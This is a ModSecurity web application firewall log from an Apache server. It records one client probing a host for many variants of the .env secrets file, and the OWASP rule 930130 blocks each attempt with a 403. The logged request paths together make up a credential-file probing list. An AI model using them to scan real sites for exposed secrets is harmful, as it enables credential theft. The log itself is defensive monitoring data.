[Mon May 11 16:41:29.040641 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.stage"] [unique_id "agHqmUWKUxpmnkK7zHyCDwAAAQo"]
[Mon May 11 16:41:29.041136 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.stage"] [unique_id "agHqmUWKUxpmnkK7zHyCDwAAAQo"]
[Mon May 11 16:41:29.041361 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.stage"] [unique_id "agHqmUWKUxpmnkK7zHyCDwAAAQo"]
[Mon May 11 16:41:29.209270 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.ci"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.ci"] [unique_id "agHqmUWKUxpmnkK7zHyCEAAAAQo"]
[Mon May 11 16:41:29.209781 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.ci"] [unique_id "agHqmUWKUxpmnkK7zHyCEAAAAQo"]
[Mon May 11 16:41:29.210023 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.ci"] [unique_id "agHqmUWKUxpmnkK7zHyCEAAAAQo"]
[Mon May 11 16:41:29.379916 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.docker"] [unique_id "agHqmUWKUxpmnkK7zHyCEQAAAQo"]
[Mon May 11 16:41:29.380423 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.docker"] [unique_id "agHqmUWKUxpmnkK7zHyCEQAAAQo"]
[Mon May 11 16:41:29.380667 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.docker"] [unique_id "agHqmUWKUxpmnkK7zHyCEQAAAQo"]
[Mon May 11 16:41:29.846686 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.live"] [unique_id "agHqmUWKUxpmnkK7zHyCEgAAAQo"]
[Mon May 11 16:41:29.847192 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.live"] [unique_id "agHqmUWKUxpmnkK7zHyCEgAAAQo"]
[Mon May 11 16:41:29.847422 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.live"] [unique_id "agHqmUWKUxpmnkK7zHyCEgAAAQo"]
[Mon May 11 16:41:30.034675 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.preprod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.preprod"] [unique_id "agHqmkWKUxpmnkK7zHyCEwAAAQo"]
[Mon May 11 16:41:30.035180 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.preprod"] [unique_id "agHqmkWKUxpmnkK7zHyCEwAAAQo"]
[Mon May 11 16:41:30.035417 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.preprod"] [unique_id "agHqmkWKUxpmnkK7zHyCEwAAAQo"]
[Mon May 11 16:41:30.198604 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.uat"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.uat"] [unique_id "agHqmkWKUxpmnkK7zHyCFQAAAQo"]
[Mon May 11 16:41:30.199199 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.uat"] [unique_id "agHqmkWKUxpmnkK7zHyCFQAAAQo"]
[Mon May 11 16:41:30.199489 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.uat"] [unique_id "agHqmkWKUxpmnkK7zHyCFQAAAQo"]
[Mon May 11 16:41:30.364409 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.dist"] [unique_id "agHqmkWKUxpmnkK7zHyCFgAAAQo"]
[Mon May 11 16:41:30.364938 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.dist"] [unique_id "agHqmkWKUxpmnkK7zHyCFgAAAQo"]
[Mon May 11 16:41:30.365176 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.dist"] [unique_id "agHqmkWKUxpmnkK7zHyCFgAAAQo"]
[Mon May 11 16:41:30.748787 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.swp"] [unique_id "agHqmkWKUxpmnkK7zHyCFwAAAQo"]
[Mon May 11 16:41:30.749413 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.swp"] [unique_id "agHqmkWKUxpmnkK7zHyCFwAAAQo"]
[Mon May 11 16:41:30.749713 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.swp"] [unique_id "agHqmkWKUxpmnkK7zHyCFwAAAQo"]
[Mon May 11 16:41:30.913250 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHqmkWKUxpmnkK7zHyCGAAAAQo"]
[Mon May 11 16:41:30.913775 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHqmkWKUxpmnkK7zHyCGAAAAQo"]
[Mon May 11 16:41:30.914046 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHqmkWKUxpmnkK7zHyCGAAAAQo"]
[Mon May 11 16:41:31.193239 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env1"] [unique_id "agHqm0WKUxpmnkK7zHyCGgAAAQo"]
[Mon May 11 16:41:31.193825 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env1"] [unique_id "agHqm0WKUxpmnkK7zHyCGgAAAQo"]
[Mon May 11 16:41:31.194063 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env1"] [unique_id "agHqm0WKUxpmnkK7zHyCGgAAAQo"]
[Mon May 11 16:41:31.358052 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env2"] [unique_id "agHqm0WKUxpmnkK7zHyCGwAAAQo"]
[Mon May 11 16:41:31.358598 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env2"] [unique_id "agHqm0WKUxpmnkK7zHyCGwAAAQo"]
[Mon May 11 16:41:31.358842 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env2"] [unique_id "agHqm0WKUxpmnkK7zHyCGwAAAQo"]
[Mon May 11 16:41:31.525288 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_copy"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env_copy"] [unique_id "agHqm0WKUxpmnkK7zHyCHAAAAQo"]
[Mon May 11 16:41:31.526013 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env_copy"] [unique_id "agHqm0WKUxpmnkK7zHyCHAAAAQo"]
[Mon May 11 16:41:31.526313 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env_copy"] [unique_id "agHqm0WKUxpmnkK7zHyCHAAAAQo"]
[Mon May 11 16:41:31.707287 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.txt"] [unique_id "agHqm0WKUxpmnkK7zHyCHQAAAQo"]
[Mon May 11 16:41:31.707777 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.txt"] [unique_id "agHqm0WKUxpmnkK7zHyCHQAAAQo"]
[Mon May 11 16:41:31.708010 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.txt"] [unique_id "agHqm0WKUxpmnkK7zHyCHQAAAQo"]
